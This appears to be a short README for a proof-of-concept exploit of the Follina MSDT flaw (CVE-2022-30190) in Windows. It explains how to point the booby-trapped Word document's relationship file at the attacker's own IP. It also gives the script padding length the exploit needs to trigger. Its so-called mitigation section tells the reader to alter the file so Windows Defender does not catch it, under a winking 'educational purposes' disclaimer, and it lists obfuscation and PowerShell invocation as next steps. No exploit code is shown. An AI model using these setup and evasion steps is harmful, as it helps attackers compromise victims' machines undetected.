Just another PoC for the new MSDT-Exploit
To edit the Doc, just open with 7z, xarchiver, ... to change the value in word\rels\document.xml.rels to your IP.
The exploit must contain at least 3541 characters before the window.location.href, and they must be within the script tag. Now there are about 9000, just to be sure.
More about the exploit:
https://www.borncity.com/blog/2022/06/01/follina-schwachstelle-cve-2022-30190-warnungen-erste-angriffe-der-status/ (german)
https://packetstormsecurity.com/files/167317/msdt-poc.txt
Mitigation and workaround:
Windows Defender already knows that this is a security flaw (Trojan:Win32/Mesdetty.D), so you have to edit the file, in case you get busted.
REMEMBER: ONLY FOR EDUCATIONAL PURPOSES!!! ;)
- Obfuscation
- Invoke PS Script